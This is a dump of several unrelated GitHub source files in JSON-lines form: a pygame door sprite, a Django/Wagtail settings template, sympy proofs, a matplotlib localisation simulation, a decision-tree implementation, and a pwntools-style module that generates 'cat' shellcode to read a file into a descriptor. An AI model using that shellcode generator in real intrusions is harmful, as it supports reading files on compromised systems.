pygame.image.load(\n \"assets/door-closed.png\").convert_alpha()\n self.image_open = pygame.image.load(\n \"assets/door-open.png\").convert_alpha()\n self.locked = True\n\n self.open_sound = pygame.mixer.Sound(\n \"assets/sounds/door/door_lock_open_01.wav\")\n\n super().__init__(x, y, \"assets/door-closed.png\",\n (self.scene.player_group, self.scene.enemy_group), groups)\n\n def on_collision(self, entity):\n \"\"\"\n Called when a player has collided with the door\n\n Parameters:\n - entity: the entity that collided with the door\n \"\"\"\n super().on_collision(entity)\n if self.locked == False:\n self.scene.next_level()\n self.set_locked(True)\n\n def set_locked(self, state: bool):\n \"\"\"\n Sets whether the door is locked and updates the view\n \"\"\"\n if self.locked == state:\n return\n else:\n self.locked = state\n if self.locked:\n self.image = self.image_closed\n else:\n self.image = self.image_open\n self.open_sound.play()\n","repo_name":"olimarmite/shoot-clash","sub_path":"src/door.py","file_name":"door.py","file_ext":"py","file_size_in_byte":1677,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"1111268098","text":"\"\"\"\nDjango settings for '{{ cookiecutter.project_name }}' project.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/4.1/topics/settings/\n\nFor the full list of settings and their values, see\nhttps://docs.djangoproject.com/en/4.1/ref/settings/\n\"\"\"\n\nimport environ\nimport os\nfrom django.utils.translation import gettext_lazy as _\nfrom email.utils import getaddresses\nfrom io import StringIO\nfrom urllib.parse import urlparse\n\nBASE_DIR = environ.Path(__file__) - 2\nPROJECT_DIR = environ.Path(__file__) - 1\n\n# read 
environment variables\nenv = environ.Env()\nif os.path.isfile(BASE_DIR(\".env\")):\n env.read_env(BASE_DIR(\".env\"))\n\n# read .env from environment variable\nENV_FILE = env(\"ENV_FILE\", default=None)\nif ENV_FILE:\n env.read_env(StringIO(ENV_FILE))\n\n# environment settings\nENVIRONMENT = env(\"ENVIRONMENT\", default=\"develop\")\nDEBUG = env.bool(\"DEBUG\", default=True)\n\n# Site URL to use when referring to full URLs within the Wagtail admin backend -\n# e.g. in notification emails. Don't include '/admin' or a trailing slash\nVIRTUAL_HOST = env.str(\"VIRTUAL_HOST\", default=\"localhost\")\n\n# security settings\nSECRET_KEY = env.str(\"SECRET_KEY\", default=\"dummy\")\nINTERNAL_IPS = env.list(\"INTERNAL_IPS\", default=[\"127.0.0.1\"])\nUSE_X_FORWARDED_HOST = True\nX_FRAME_OPTIONS = \"SAMEORIGIN\"\nALLOWED_HOSTS = env.list(\"ALLOWED_HOSTS\", default=[VIRTUAL_HOST])\nCSRF_TRUSTED_ORIGINS = env.list(\n \"CSRF_TRUSTED_ORIGINS\", default=[f\"https://{VIRTUAL_HOST}\"]\n)\nSECURE_PROXY_SSL_HEADER = (\"HTTP_X_FORWARDED_PROTO\", \"https\")\n\n# Application definition\nINSTALLED_APPS = [\n # This project\n \"website\",\n # Wagtail CRX (CodeRed Extensions)\n \"coderedcms\",\n \"django_bootstrap5\",\n \"modelcluster\",\n \"taggit\",\n \"wagtailcache\",\n \"wagtailseo\",\n # Wagtail\n \"wagtail.contrib.forms\",\n \"wagtail.contrib.redirects\",\n \"wagtail.embeds\",\n \"wagtail.sites\",\n \"wagtail.users\",\n \"wagtail.snippets\",\n \"wagtail.documents\",\n \"wagtail.images\",\n \"wagtail.search\",\n \"wagtail\",\n \"wagtail.contrib.settings\",\n \"wagtail.contrib.modeladmin\",\n \"wagtail.contrib.table_block\",\n \"wagtail.admin\",\n # Django\n \"django.contrib.admin\",\n \"django.contrib.auth\",\n \"django.contrib.contenttypes\",\n \"django.contrib.sessions\",\n \"django.contrib.messages\",\n \"whitenoise.runserver_nostatic\",\n \"django.contrib.staticfiles\",\n \"django.contrib.sitemaps\",\n # additional apps\n \"storages\",\n \"sass_processor\",\n]\n\nMIDDLEWARE = [\n # Save pages to cache. Must be FIRST.\n \"wagtailcache.cache.UpdateCacheMiddleware\",\n # Common functionality\n \"django.contrib.sessions.middleware.SessionMiddleware\",\n \"django.contrib.messages.middleware.MessageMiddleware\",\n \"django.middleware.common.CommonMiddleware\",\n # Security\n \"django.middleware.csrf.CsrfViewMiddleware\",\n \"django.contrib.auth.middleware.AuthenticationMiddleware\",\n \"django.middleware.clickjacking.XFrameOptionsMiddleware\",\n \"django.middleware.security.SecurityMiddleware\",\n \"whitenoise.middleware.WhiteNoiseMiddleware\",\n # Error reporting. Uncomment this to receive emails when a 404 is triggered.\n # 'django.middleware.common.BrokenLinkEmailsMiddleware',\n # CMS functionality\n \"wagtail.contrib.redirects.middleware.RedirectMiddleware\",\n # Fetch from cache. 
Must be LAST.\n \"wagtailcache.cache.FetchFromCacheMiddleware\",\n]\n\nROOT_URLCONF = \"{{ cookiecutter.project_slug }}.urls\"\n\nTEMPLATES = [\n {\n \"BACKEND\": \"django.template.backends.django.DjangoTemplates\",\n \"APP_DIRS\": True,\n \"OPTIONS\": {\n \"context_processors\": [\n \"django.template.context_processors.debug\",\n \"django.template.context_processors.request\",\n \"django.contrib.auth.context_processors.auth\",\n \"django.contrib.messages.context_processors.messages\",\n \"wagtail.contrib.settings.context_processors.settings\",\n ],\n },\n },\n]\n\nWSGI_APPLICATION = \"{{ cookiecutter.project_slug }}.wsgi.application\"\n\n\n# Database\n# https://docs.djangoproject.com/en/4.1/ref/settings/#databases\nDATABASE_URL = env(\"DATABASE_URL\", default=\"sqlite:///db.sqlite3\")\nDATABASES = {\"default\": env.db(default=\"sqlite:///db.sqlite3\")}\n\n# cache config\nCACHES = {\"default\": env.cache(default=\"locmemcache://\")}\n\n# Password validation\n# https://docs.djangoproject.com/en/4.1/ref/settings/#auth-password-validators\nAUTH_PASSWORD_VALIDATORS = [\n {\n \"NAME\": \"django.contrib.auth.password_validation.UserAttributeSimilarityValidator\",\n },\n {\n \"NAME\": \"django.contrib.auth.password_validation.MinimumLengthValidator\",\n },\n {\n \"NAME\": \"django.contrib.auth.password_validation.CommonPasswordValidator\",\n },\n {\n \"NAME\": \"django.contrib.auth.password_validation.NumericPasswordValidator\",\n },\n]\n\n# Internationalization\n# https://docs.djangoproject.com/en/4.1/topics/i18n/\nLANGUAGE_CODE = \"pt-br\"\nLANGUAGES = [(\"pt-br\", _(\"Português Brasil\"))]\nTIME_ZONE = env(\"TIME_ZONE\", default=\"America/Recife\")\nUSE_I18N = True\nUSE_TZ = True\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/4.1/howto/static-files/\n\nSTATICFILES_FINDERS = [\n \"django.contrib.staticfiles.finders.FileSystemFinder\",\n \"django.contrib.staticfiles.finders.AppDirectoriesFinder\",\n \"sass_processor.finders.CssFinder\",\n]\nSTATIC_ROOT = env(\"STATIC_ROOT\", default=BASE_DIR(\"staticfiles\"))\nSTATIC_URL = env(\"STATIC_URL\", default=\"/static/\")\nWHITENOISE_KEEP_ONLY_HASHED_FILES = True\nif not DEBUG:\n STATICFILES_STORAGE = \"whitenoise.storage.Compressed{% if cookiecutter.whitenoise_static %}Manifest{% endif %}StaticFilesStorage\"\n\nSASS_PROCESSOR_AUTO_INCLUDE = True\nSASS_OUTPUT_STYLE = \"compact\"\n\n# Media files\nMEDIA_ROOT = env(\"MEDIA_ROOT\", default=BASE_DIR(\"media\"))\nMEDIA_URL = env(\"MEDIA_URL\", default=\"/media/\")\nDATA_UPLOAD_MAX_MEMORY_SIZE = 20 * 1024**2 # max upload data 20 MB\nFILE_UPLOAD_DIRECTORY_PERMISSIONS = 0o755\nFILE_UPLOAD_PERMISSIONS = 0o644\n\n# Email config\nADMINS = getaddresses([env(\"ADMINS\", default=\"\")])\nMANAGERS = ADMINS\nDEFAULT_FROM_EMAIL = env(\"DEFAULT_FROM_EMAIL\", default=None)\nSERVER_EMAIL = env(\"SERVER_EMAIL\", default=DEFAULT_FROM_EMAIL)\nvars().update(env.email_url(\"EMAIL_URL\", default=\"consolemail://\"))\n\n# Login\nLOGIN_URL = \"wagtailadmin_login\"\nLOGIN_REDIRECT_URL = \"wagtailadmin_home\"\n\n# Wagtail settings\nWAGTAIL_SITE_NAME = \"{{ cookiecutter.project_name }}\"\nWAGTAIL_ENABLE_UPDATE_CHECK = False\nWAGTAILSEARCH_BACKENDS = {\"default\": {\"BACKEND\": \"wagtail.search.backends.database\"}}\nWAGTAIL_I18N_ENABLED = False\nWAGTAILADMIN_COMMENTS_ENABLED = False\nWAGTAILIMAGES_MAX_UPLOAD_SIZE = 8 * 1024**2 # 8 MB\nWAGTAILADMIN_BASE_URL = f\"https://{VIRTUAL_HOST}\"\n\n# Tags\nTAGGIT_CASE_INSENSITIVE = True\n\n# Sets default for primary key IDs\n# See 
https://docs.djangoproject.com/en/4.1/ref/models/fields/#bigautofield\nDEFAULT_AUTO_FIELD = \"django.db.models.BigAutoField\"\n\n# logging\nLOGGING = {\n \"version\": 1,\n \"disable_existing_loggers\": False,\n \"formatters\": {\n \"verbose\": {\"format\": \"%(levelname)s %(asctime)s %(module)s %(message)s\"}\n },\n \"handlers\": {\n \"console\": {\n \"level\": \"DEBUG\",\n \"class\": \"logging.StreamHandler\",\n \"formatter\": \"verbose\",\n }\n },\n \"root\": {\"level\": \"INFO\", \"handlers\": [\"console\"]},\n}\n\n# sentry error reporter\nSENTRY_DSN = env.str(\"SENTRY_DSN\", default=None)\nif SENTRY_DSN: # sentry is configured\n import sentry_sdk\n from sentry_sdk.integrations.django import DjangoIntegration, RedisIntegration\n\n sentry_sdk.init(\n dsn=SENTRY_DSN,\n integrations=[DjangoIntegration(), RedisIntegration()],\n environment=ENVIRONMENT,\n traces_sample_rate=1.0,\n send_default_pii=True,\n )\n\n# S3 media bucket\nS3_MEDIA_BUCKET_URL = env.url(\"S3_MEDIA_BUCKET_URL\", default=None)\nif S3_MEDIA_BUCKET_URL:\n DEFAULT_FILE_STORAGE = \"storages.backends.s3boto3.S3Boto3Storage\"\n AWS_DEFAULT_ACL = \"public-read\"\n AWS_QUERYSTRING_AUTH = False\n AWS_PRIVATE_QUERYSTRING_AUTH = True\n AWS_ACCESS_KEY_ID = S3_MEDIA_BUCKET_URL.username\n AWS_SECRET_ACCESS_KEY = S3_MEDIA_BUCKET_URL.password\n AWS_STORAGE_BUCKET_NAME = S3_MEDIA_BUCKET_URL.path.strip(\"/\")\n AWS_PRIVATE_STORAGE_BUCKET_NAME = AWS_STORAGE_BUCKET_NAME\n AWS_QUERYSTRING_EXPIRE = 3600\n\n# develop environment settings\nif DEBUG:\n WAGTAIL_CACHE = False\n\n # enable debug toolbar if available\n try:\n import debug_toolbar\n except ImportError:\n pass\n else:\n INSTALLED_APPS += [\"debug_toolbar\"]\n MIDDLEWARE += [\"debug_toolbar.middleware.DebugToolbarMiddleware\"]\n","repo_name":"roldaojr/cookiecutter-wagtail","sub_path":"{{ cookiecutter.project_slug }}/{{ cookiecutter.project_slug }}/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":8621,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"42433775655","text":"from util import *\n\n\n@apply\ndef apply(given):\n function, *limits = given.of(Any)\n limits = [(x,) for x, *_ in limits]\n limits[0] = (limits[0][0], function)\n return Any(given.limits_cond, *limits)\n\n\n@prove\ndef prove(Eq):\n from axiom import sets\n S = Symbol(etype=dtype.real)\n e, t = Symbol(real=True)\n f, g = Function(shape=(), integer=True)\n\n Eq << apply(Any[e:g(e) > 0](f(e) > 0))\n\n A = Symbol(conditionset(e, g(e) > 0))\n B = Symbol(conditionset(e, f(e) > 0))\n\n Eq.A_definition = A.this.definition\n Eq.B_definition = B.this.definition\n\n Eq << Any[e:A](Element(e, B), plausible=True)\n\n Eq << Eq[-1].this.expr.rhs.definition\n\n Eq << Eq[-1].subs(Eq.A_definition)\n\n Eq << sets.any_el.imply.any_el.limits.swap.apply(Eq[2], simplify=False)\n\n Eq << Eq[-1].this.expr.rhs.definition\n\n Eq << Eq[-1].subs(Eq.B_definition)\n\n\nif __name__ == '__main__':\n run()\n\n# created on 2020-09-05\n","repo_name":"cosmosZhou/sympy","sub_path":"axiom/sets/any/imply/any/limits/swap.py","file_name":"swap.py","file_ext":"py","file_size_in_byte":933,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"83"} +{"seq_id":"34453428133","text":"from pwn.internal.shellcode_helper import *\nfrom open_file import open_file\nfrom sendfile import sendfile\nfrom read_stack import read_stack\nfrom write_stack import write_stack\n\n@shellcode_reqs(arch=['i386', 'amd64', 'arm'], os=['linux', 'freebsd'])\ndef cat(filepath, out_fd = 1, 
use_sendfile = False, os = None, arch = None):\n \"\"\"Args: filepath, [out_fd (imm/reg) = STDOUT_FILENO] [use_sendfile]\n\n Opens a file and writes it to the specified file descriptor.\n\n Set use_sendfile to True to use the sendfile syscall instead of a read+write loop.\n This causes the shellcode to be slightly smaller.\n \"\"\"\n\n if arch == 'i386':\n if os in ['linux', 'freebsd']:\n return _cat_i386(filepath, out_fd, use_sendfile)\n elif arch == 'amd64':\n if os in ['linux', 'freebsd']:\n return _cat_amd64(filepath, out_fd, use_sendfile)\n elif arch == 'arm' and os == 'linux':\n return _cat_linux_arm(filepath, out_fd)\n\n no_support('cat', os, arch)\n\ndef _cat_i386(filepath, out_fd, use_sendfile):\n if use_sendfile:\n return open_file(filepath), sendfile('eax', out_fd)\n else:\n return (open_file(filepath),\n \"xchg ebp, eax\\ncat_helper1:\",\n read_stack('ebp', 48, False),\n \"test eax, eax\\njle cat_helper2\",\n write_stack(out_fd, 'eax'),\n \"jmp cat_helper1\\ncat_helper2:\")\n\ndef _cat_amd64(filepath, out_fd, use_sendfile):\n if use_sendfile:\n return open_file(filepath), sendfile('rax', out_fd)\n else:\n return (open_file(filepath),\n \"xchg ebp, eax\\ncat_helper1:\",\n read_stack('rbp', 48, False),\n \"test eax, eax\\njle cat_helper2\",\n write_stack(out_fd, 'rax'),\n \"jmp cat_helper1\\ncat_helper2:\")\n\ndef _cat_linux_arm(filepath, out_fd):\n return (open_file(filepath),\n 'mov r8, r0\\ncat_helper1:',\n read_stack('r8', 48, False),\n 'cmp r0, #0\\nble cat_helper2',\n write_stack(out_fd, 'r0'),\n 'b cat_helper1\\ncat_helper2:')\n","repo_name":"Haabb/pwnfork","sub_path":"pwn/shellcode/io/cat.py","file_name":"cat.py","file_ext":"py","file_size_in_byte":2082,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"20585996466","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib \nfrom matplotlib.animation import FuncAnimation\nimport matplotlib.animation as animation\nimport PIL as pl\nfrom shapely.geometry import Polygon\nfrom shapely.geometry import Point\nfrom shapely.ops import cascaded_union\nfrom itertools import combinations\nfrom scipy import interpolate\n\n#TODO\n# Simulate with discrete steps in receiver resolution\nsave = 1\n\nheatmap_on = 0\npixel_res = 5\ncone_plot = 0\n\nanimation_on = 0\n\n# Uncertainty of the direction of nodes\nres_angle = 5\nres_angle_arr = np.arange(0, 181-res_angle, res_angle)\n\nscat_width = 3\nmarksize = 4\n\nres_angle_rad = res_angle/360*2*np.pi\n\ncorner_point_coordinates = np.array([[480,780],[22,774],[28,391],[37,11],[495,16]])\nsweep_first_point_coordinates = np.array([[-1200,600],[-300, -900],[500, -7300],[900,-50],[800, 1000]])\n\nTx_coordinates = np.array([340,410])\n\nhockey_field_width = 55\nhockey_field_height = 45.8*2\nnormalization_factor = hockey_field_width/458\nsize_hockey_field = hockey_field_width*hockey_field_height\n\ndef pixels_to_metres(pixels):\n return pixels*normalization_factor\ndef metres_to_pixels(metres):\n return metres*(1/normalization_factor)\n\ndef pixels_to_metres_sqrt(pixels):\n return pixels*normalization_factor**2\n\nfig, ax = plt.subplots()\nimg = plt.imread(\"hockey_field_edit.png\")\n\nxlim_img = img.shape[1]\nylim_img = img.shape[0]\nif cone_plot:\n plt.scatter(corner_point_coordinates[2,0],corner_point_coordinates[2,1],marker = \"2\",clip_on = True, label = 'TRx position',zorder = 2,linewidths=scat_width, s = 20*2**marksize)\nelse:\n 
plt.scatter(corner_point_coordinates[:,0],corner_point_coordinates[:,1],marker = \"2\",clip_on = True, label = 'TRx position',zorder = 2,linewidths=scat_width, s = 20*2**marksize)\n\nplt.xlim( 0,xlim_img)\nplt.ylim( 0,ylim_img)\nax.set_ylim(ax.get_ylim()[::-1])\n\nax.imshow(img)\nfig.set_size_inches(11, 7)\n\nhockey_field_width = 55\n\nchar_arr = [\"B\",\"C\",\"E\",\"F\",\"G\"]\npol_tri_plot = {}\ntriangle = {}\ntri_area_calc = {}\ncertain_area_plot = []\nTx_plot = []\nselect_triangles = {}\nframe_number = ax.text(50,100, \"\", fontsize=15)\n\ndef update_triangles():\n if len(ax.lines) != 0:\n for k in range(0,len(char_arr)):\n ax.patches[0].remove()\n ax.lines[0].remove()\n ax.collections[1].remove()\n\n cur_node =corner_point_coordinates[1,:]\n first_point = np.array([-200,-500]) + cur_node\n # Raster of detection triangles for each node\n for j in char_arr:\n cur_node = corner_point_coordinates[char_arr.index(j)]\n first_point = sweep_first_point_coordinates[char_arr.index(j),:] + cur_node\n for k in res_angle_arr:\n \n first_point_vec = first_point - cur_node\n #sec_point = np.array([np.tan(res_angle_rad)*first_point_vec[0], -pow(first_point_vec[0],2)*np.tan(res_angle_rad)/first_point_vec[1] ])\n sec_point = np.array([(first_point_vec[1]*np.tan(res_angle_rad/2)), -(first_point_vec[0]*np.tan(res_angle_rad/2))])\n #pol_tri = plt.Polygon([cur_node,cur_node+first_point_vec,sec_point+first_point_vec+cur_node],color='m', fill = True)\n pol_tri = Polygon([cur_node,cur_node+first_point_vec+sec_point, cur_node+first_point_vec-sec_point])\n if j == 'E' and cone_plot:\n if k == 0:\n fan_plot= plt.Polygon([cur_node,cur_node+first_point_vec+sec_point, cur_node+first_point_vec-sec_point],color='m', fill = True, alpha =0.35,label = 'Angle bin')\n else:\n fan_plot= plt.Polygon([cur_node,cur_node+first_point_vec+sec_point, cur_node+first_point_vec-sec_point],color='m', fill = True, alpha =0.35)\n ax.add_patch(fan_plot)\n if pol_tri.contains(Point(Tx_coordinates[0],Tx_coordinates[1])):\n tri_area_calc[j] = pol_tri\n if j == 'B':\n pol_tri_plot = plt.Polygon([cur_node,cur_node+first_point_vec+sec_point, cur_node+first_point_vec-sec_point],color='b', fill = True, alpha =0.3, label = 'Selected angle bin')\n else:\n pol_tri_plot = plt.Polygon([cur_node,cur_node+first_point_vec+sec_point, cur_node+first_point_vec-sec_point],color='b', fill = True, alpha =0.3)\n if not cone_plot:\n ax.add_patch(pol_tri_plot)\n rotate_origin = np.array([np.cos(res_angle_rad)*first_point_vec[0]-np.sin(res_angle_rad)*first_point_vec[1], np.sin(res_angle_rad)*first_point_vec[0] + np.cos(res_angle_rad)*first_point_vec[1] ])\n first_point = cur_node+rotate_origin\n\n # for j in char_arr:\n # current_node = corner_point_coordinates[char_arr.index(j)]\n # scale_factor = 100\n # Node_to_Tx_vec = (Tx_coordinates-current_node) * scale_factor\n\n # point_triangle = np.array([(Node_to_Tx_vec[1]*np.tan(res_angle_rad/2)), -(Node_to_Tx_vec[0]*np.tan(res_angle_rad/2))])\n # triangle[j] = plt.Polygon( [current_node, point_triangle+Node_to_Tx_vec+current_node, -point_triangle+Node_to_Tx_vec+current_node], color='b', fill = True, alpha =0.3)\n \n # tri_area_calc[j] = Polygon([current_node,point_triangle+Node_to_Tx_vec+current_node,-point_triangle+Node_to_Tx_vec+current_node])\n\n # #ax.add_patch(triangle[j])\n\n intersect = tri_area_calc[\"B\"]\n def intersection(shape1, shape2):\n return shape1.intersection(shape2)\n\n for j in tri_area_calc:\n intersect = intersection(intersect, tri_area_calc[j])\n\n if not cone_plot:\n certain_area_plot = 
ax.plot(*intersect.exterior.xy,label = 'Tx estimated area', color = 'r')\n certain_area = intersect.area\n\n #print(\"Area where Tx is with 100% certainty: \" + str(pixels_to_metres_sqrt(certain_area))+ \"m^2, hockey field is \" + str(size_hockey_field)+\"m^2\")\n #print(\"Which is \" + str(pixels_to_metres_sqrt(certain_area)/size_hockey_field*100)+ \"% of the entire field\")\n if not cone_plot:\n Tx_plot = ax.scatter(Tx_coordinates[0],Tx_coordinates[1] ,marker=\"x\", color = 'silver', label = 'Tx real position',zorder = 2,linewidths=scat_width, s = 50)\n if heatmap_on:\n return pixels_to_metres_sqrt(certain_area)\n else:\n return \n\ndef init():\n # ax.imshow(img)\n # frame_number.set_text(\"0\")\n # ax.legend(loc='upper center', bbox_to_anchor=(0.5, 1.1),\n # ncol=3, fancybox=True)\n # ax.legend()\n return ax, # this part seems to be the problem to return the white plots\n\ndef update(frame):\n # Draw the circles which relate the RSSI to distance \n # for j in char_arr:\n # circle[j].radius = distance_normalized[j][frame]\n # frame_number.set_text(frame)\n global Tx_coordinates \n x = 250 + 200 * np.sin(np.radians(frame))\n y = 400 + 200 * np.cos(np.radians(frame))\n #Tx_coordinates = Tx_coordinates + np.array([x,y])\n Tx_coordinates = np.array([x,y])\n \n #Tx, c_area, Tri = update_triangles()\n update_triangles()\n return ax,\n\ndist_node_hm = 25\nheatmap_xmin = np.min(corner_point_coordinates[:,0])+dist_node_hm\nheatmap_ymin = np.min(corner_point_coordinates[:,1])+dist_node_hm\nheatmap_xmax = np.max(corner_point_coordinates[:,0])-dist_node_hm\nheatmap_ymax = np.max(corner_point_coordinates[:,1])-dist_node_hm\nheatmap_data = np.empty((img.shape[1],img.shape[0]))\nheatmap_data[:] = np.nan\n\n\nif animation_on:\n ani = FuncAnimation(fig, update, frames=600, interval = 10,init_func=init, blit=True, repeat = False)\n #update_triangles()\n #matplotlib.rcParams['animation.ffmpeg_path'] = \"C:\\\\Users\\\\s153480\\\\Desktop\\\\ffmpeg-2022-11-03-git-5ccd4d3060-full_build\\\\bin\\\\ffmpeg.exe\"\n #writer = animation.FFMpegWriter(fps=24, metadata=dict(artist='Me'))\n #ani.save('Hockey_field_simulation.mp4', writer = writer)\nelif heatmap_on:\n Tx_coordinates = np.array([heatmap_xmin,heatmap_ymin])\n for k in range(heatmap_xmin,heatmap_xmax):\n for j in range(heatmap_ymin,heatmap_ymax):\n if (j-heatmap_ymin) % pixel_res ==0 and (k-heatmap_xmin) % pixel_res == 0:\n heatmap_data[k][j] = update_triangles()\n Tx_coordinates = Tx_coordinates + np.array([0,1])\n Tx_coordinates = Tx_coordinates - np.array([0,heatmap_ymax-heatmap_ymin]) + np.array([1,0])\n \n # Removing triangle lines\n for k in range(0,len(char_arr)):\n ax.patches[0].remove()\n ax.lines[0].remove()\n ax.collections[1].remove()\n\n plt.imshow(np.transpose(heatmap_data), cmap='jet', interpolation='nearest', label = \"Minimal search area [m$^2$]\")\n clrbar = plt.colorbar()\n clrbar.ax.set_ylabel('Size of search area [m$^2]$')\n for item in ([clrbar.ax.yaxis.label] + clrbar.ax.get_yticklabels()):\n item.set_fontsize(16)\nelse:\n update_triangles()\n \n\n\nxax_name_list = np.array([0,10,20,30,40,50,60])\nxax_val_list = metres_to_pixels(xax_name_list)\n\nax.xaxis.set_major_locator(matplotlib.ticker.FixedLocator((xax_val_list)))\nax.xaxis.set_major_formatter(matplotlib.ticker.FixedFormatter((xax_name_list)))\n\nax.set_ylim(ax.get_ylim()[::-1])\n\nyax_name_list = np.array([0,10,20,30,40,50,60,70,80,90,100,110])\nyax_val_list = 
metres_to_pixels(yax_name_list)\n\nax.yaxis.set_major_locator(matplotlib.ticker.FixedLocator((yax_val_list)))\nax.yaxis.set_major_formatter(matplotlib.ticker.FixedFormatter((yax_name_list)))\n\n\nax.set_xlabel('X coordinates [m]')\nax.set_ylabel('Y coordinates [m]')\n\n\nfor item in ([ax.title, ax.xaxis.label, ax.yaxis.label] + \n ax.get_xticklabels() + ax.get_yticklabels()):\n item.set_fontsize(16)\n\n#ax.legend(fontsize = 16)\n\nif cone_plot:\n ax.legend(loc='upper center', bbox_to_anchor=(0.5, 1),fontsize = 13,framealpha=1)\n plt.show()\n fig.savefig(\"Cone_bin_example.png\",bbox_inches='tight', format = 'png')\n\nif save and not heatmap_on:\n ax.legend(loc='upper center', bbox_to_anchor=(0.5, 1.12),fontsize = 13,framealpha=1)\n plt.show()\n fig.savefig(\"Cones_example_hockey_field_v3.png\",bbox_inches='tight', format = 'png')\n fig.savefig(\"Cones_example_hockey_field_v3.eps\",bbox_inches='tight', format = 'eps')\nelif save and heatmap_on:\n ax.legend(loc='upper center', bbox_to_anchor=(0.5, 1.0),fontsize = 13,framealpha=1)\n plt.show()\n fig.savefig(\"Heatmap_hockey_field_v3.png\",bbox_inches='tight', format = 'png')\n fig.savefig(\"Heatmap_hockey_field_v3.eps\",bbox_inches='tight', format = 'eps')\n\n\nprint('end')","repo_name":"awjvankast/Graduation-project","sub_path":"VScode/Python/hockey_field_simulation.py","file_name":"hockey_field_simulation.py","file_ext":"py","file_size_in_byte":10331,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"42433990855","text":"from util import *\n\n\n@apply\ndef apply(self):\n from axiom.algebra.all.doit.inner.setlimit import doit\n return Equal(self, doit(Cup, self))\n\n\n@prove\ndef prove(Eq):\n from axiom import sets\n\n x = Symbol(etype=dtype.real, shape=(oo, oo))\n i, j, a, b, c, d = Symbol(integer=True)\n m = Symbol(integer=True, positive=True)\n Eq << apply(Cup[j:{a, b, c, d}, i:m](x[i, j]))\n\n s = Function(etype=dtype.real, eval=lambda i: Cup[j:{a, b, c, d}](x[i, j]))\n Eq << s(i).this.defun()\n\n Eq << sets.eq.imply.eq.cup.apply(Eq[-1], (i, 0, m))\n\n Eq << Eq[-2].this.rhs.apply(sets.cup.to.union.doit.setlimit)\n\n Eq << Eq[-2].subs(Eq[-1])\n\n Eq << Eq[-1].reversed\n\n \n\n\nif __name__ == '__main__':\n run()\n\n# created on 2021-02-05\n# updated on 2022-04-03\n","repo_name":"cosmosZhou/sympy","sub_path":"axiom/sets/cup/doit/inner/setlimit.py","file_name":"setlimit.py","file_ext":"py","file_size_in_byte":768,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"83"} +{"seq_id":"7261533461","text":"import numpy\nimport pandas\nimport utils\n\n\n# Example of building a tree\n# Split a dataset based on an attribute and an attribute value\ndef test_split(index, value, dataset):\n left, right = list(), list()\n for row in dataset:\n if row[index] < value:\n left.append(row)\n else:\n right.append(row)\n return left, right\n\n\n# Calculate the Gini index for a split dataset\ndef gini_index(groups, classes):\n # count all samples at split point\n n_instances = float(sum([len(group) for group in groups]))\n # sum weighted Gini index for each group\n gini = 0.0\n for group in groups:\n size = float(len(group))\n # avoid divide by zero\n if size == 0:\n continue\n score = 0.0\n # score the group based on the score for each class\n for class_val in classes:\n p = [row[-1] for row in group].count(class_val) / size\n score += p * p\n # weight the group score by its relative size\n gini += (1.0 - score) * (size / n_instances)\n return gini\n\n\n# 
Select the best split point for a dataset\ndef get_split(dataset):\n class_values = list(set(row[-1] for row in dataset))\n b_index, b_value, b_score, b_groups = 999, 999, 999, None\n for index in range(len(dataset[0]) - 1):\n print(f\"Característica: {get_feature(index)}\")\n for row in dataset:\n groups = test_split(index, row[index], dataset)\n gini = gini_index(groups, class_values)\n print(f\"Valor Gini en Row: {row} es {gini}\")\n if gini < b_score:\n b_index, b_value, b_score, b_groups = index, row[index], gini, groups\n return {'index': b_index, 'value': b_value, 'izq': b_groups[0], 'der': b_groups[1], 'groups': b_groups}\n\n\n# Create a terminal node value\ndef to_terminal(group):\n outcomes = [row[-1] for row in group]\n return max(set(outcomes), key=outcomes.count)\n\n\n# Create child splits for a node or make terminal\ndef split(node, max_depth, min_size, depth):\n left, right = node['groups']\n del (node['groups'])\n # check for a no split\n if not left or not right:\n node['left'] = node['right'] = to_terminal(left + right)\n return\n # check for max depth\n if depth >= max_depth:\n node['left'], node['right'] = to_terminal(left), to_terminal(right)\n return\n # process left child\n if len(left) <= min_size:\n node['left'] = to_terminal(left)\n else:\n node['left'] = get_split(left)\n split(node['left'], max_depth, min_size, depth + 1)\n # process right child\n if len(right) <= min_size:\n node['right'] = to_terminal(right)\n else:\n node['right'] = get_split(right)\n split(node['right'], max_depth, min_size, depth + 1)\n\n\n# Build a decision tree\ndef build_tree(train, max_depth, min_size):\n root = get_split(train)\n split(root, max_depth, min_size, 1)\n return root\n\n\ndef concatenate_dataset(X, y):\n dataset = None\n if isinstance(X, numpy.ndarray) or isinstance(X, list):\n dataset = pandas.DataFrame(X)\n if isinstance(y, numpy.ndarray) or isinstance(y, list):\n dataset = dataset.join(pandas.DataFrame(y, columns=['target'])['target'])\n return dataset.values.tolist()\n\n\ndef predict(node, row):\n if row[node['index']] < node['value']:\n if isinstance(node['left'], dict):\n return predict(node['left'], row)\n else:\n return node['left']\n else:\n if isinstance(node['right'], dict):\n return predict(node['right'], row)\n else:\n return node['right']\n\n\ndef get_feature(index):\n features = ['sepal-length', 'sepal-width', 'petal-length', 'petal-width']\n return features[index]\n\n\ndef print_tree(node, depth=0):\n if isinstance(node, dict):\n print('%s[%s < %.4f] División: izq: %i, der: %i' % (depth * ' ', (get_feature(node['index'])), node['value'], len(node['izq']), len(node['der'])))\n print_tree(node['left'], depth + 1)\n print_tree(node['right'], depth + 1)\n else:\n print('%s[%s]' % (depth * ' ', node))\n\n\nclass DecisionTreeStatic:\n def __init__(self, max_depth=1, min_size=1):\n self._X = None\n self._y = None\n self._dataset = None\n self._root = None\n self._max_depth = max_depth\n self._min_size = min_size\n\n def fit(self, X, y):\n self._X = X\n self._y = y\n self._dataset = concatenate_dataset(self._X, self._y)\n self._root = build_tree(self._dataset, self._max_depth, self._min_size)\n return self._root\n\n def 